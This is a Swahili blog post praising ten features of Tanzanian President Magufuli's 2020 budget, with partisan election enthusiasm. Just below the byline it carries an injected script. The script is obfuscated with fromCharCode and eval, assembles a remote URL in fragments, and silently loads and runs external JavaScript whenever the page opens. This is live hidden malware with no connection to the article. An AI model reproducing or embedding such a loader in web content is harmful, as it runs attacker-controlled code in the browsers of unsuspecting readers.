Recent Comments

10 MATAMU BAJETI YA 5 YA JPM KABLA HAJARUDI KWA KISHINDO.

By ObyMack David Jun 13, 2020
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Jana Rais anayetajwa kuwa mtu wa 9 Afrika kwa kuleta mageuzi yasiyotarajiwa (African Disruptor), ameweka hadharani bajeti yake ya 5 katika muhula wake wa kwanza kabla wananchi hawajamchagua kwa kishindo tena Oktoba, 2020. Ungana nami hapa:

1. Sio Sifa Kapiga Kazi: Katika Bajeti hii utakutana na mabilioni yaliyotumika, yakielezwa yametumika wapi na katika mradi gani ambao ukitajwa tu wananchi wa eneo husika wanauona;

2. Ni Bajeti ya Kujitegemea: Ukiyaangalia mambo mengi aliyoyataja Waziri wa Fedha yamefanyika kwa mara ya kwanza kwa kiasi kikubwa kwa kutumia fedha za ndani ya nchi au mikopo ambayo tunailipa;

3. Amelinda Viwanda vya Ndani: Katika bajeti hii dhana kwamba Tanzania ina viwanda zaidi ya 4,000 imezidi kujionesha-vimeanza vimezidi kutema bidhaa nyingi sokoni kwa hiyo ktk maeneo mengi ya bajeti utaona bidhaa nyingi za nje zimeongezewa kodi ili kulinda viwanda na bidhaa za ndani. AKILI KUBWA;

4. Kawafuta Chozi Watumishi wa Umma na Sekta Binafsi: Ukiisoma bajeti hii ni kwamba Rais kaongeza mishahara kiaina. Kapunguza kiwango cha wanaopaswa kulipa kodi ya mshahara ili wengi wabaki na fedha walizokuwa wanakatwa. Mfano mtu mwenye mshahara wa laki 2 kama alikuwa anakatwa kodi na kupokea laki 160. sasa rasmi kuanzia Julai , 2020 mshahara wake utapanda kwa kutokatwa kodi na ukiacha labda bima ya afya anaweza kujikuta anapokea Laki 190, hapa serikali imepandisha mshahara, tena kwa sekta zote;

5. Kailinda Sekta ya Kilimo: Kuna kodi nyingi zimeongezwa kwenye bidhaa za nje na kupunguzwa kwenye bidhaa za ndani ikiwemo kwenye masuala ya bima za kilimo, usafirishaji wa mifugo, mazao n.k;

6. Kawalinda Wafanyabiashara Wadogo: Kuna mambo huyu Mzee Magu tutamwelewa badae yani ilikuwa Brela kufungua kampuni au kuhuisha data lazima ukapigwe mahela kwa wakili, kafuta, sasa unafungua tu na kusaini mwenyewe; kaondoa vikwazo kibao vya ufanyaji biashara ikiwemo kushusha au kufuta makodikodi ya kina Fire sijui OSHA yaani kwa Magu madude yasiyoeleweka ni FUTA/DELETE

7. Mambo makubwa yanaendelea: Huyu Mzee Magu balaa hasahau bado ataendelea kumwaga mabilioni ya kodi za wanafunzi, anaendelea kumwaga mabilioni ya Mradi wa Reli, kumwaga mabilioni ya mradi wa Umeme, elimu bure, hospitali za mikoa, wilaya na vituo vya afya n.k. Kiufupi Mzee Magu ni mbishi kwenye mambo ya maendeleo. Safi kabisa;
8. Ooh hasaidii Covid 19 Sijui Nini; Acheni umbea, kafuta kodi kibao za vifaa kama Sanitizer, barakoa na magauni yale ya madokta, haya acheni kidomodomo sasa tengenezeni hizo bidhaa mpata hela. Huyu Mzee basi tu angepiga kama miaka 20 hivi Tandale pangekuwa kama Tennessee Valley Authority ya kule Marekani?? 9. Uchaguzi Mkuu Wamwagiwa mahela nao: kidomodomo kingine hiki, ooh ataahirisha ajiongezee muda, sijui hakuna demokrasia na nini, mfyuuuuuu! haya njooni uwanjani sasa mueleze mmefanya nini katika miaka mitano ya kupiga nyagi na kujiangusha kwenye ngazi??????JPM katenga mabilioni ya uchaguzi na uchaguzi upo pale pale mbona mmenuna sasa????Si mlitaka demokrasia nyie, njooni sasa!
10. Bao la Morrison: Bao la Morrison ndio fungakazi kwa ujumla katika bajeti hii na kwa ujumla limehitimisha furaha ya Watanzania katika Miaka Mitano ya Kazi ya Dkt. John Pombe Magufuli. Yani kwa bao la Morrison na kwa haya makubwa aliyoyafanya JPM mambo ni NIMAGUFULITENA2020.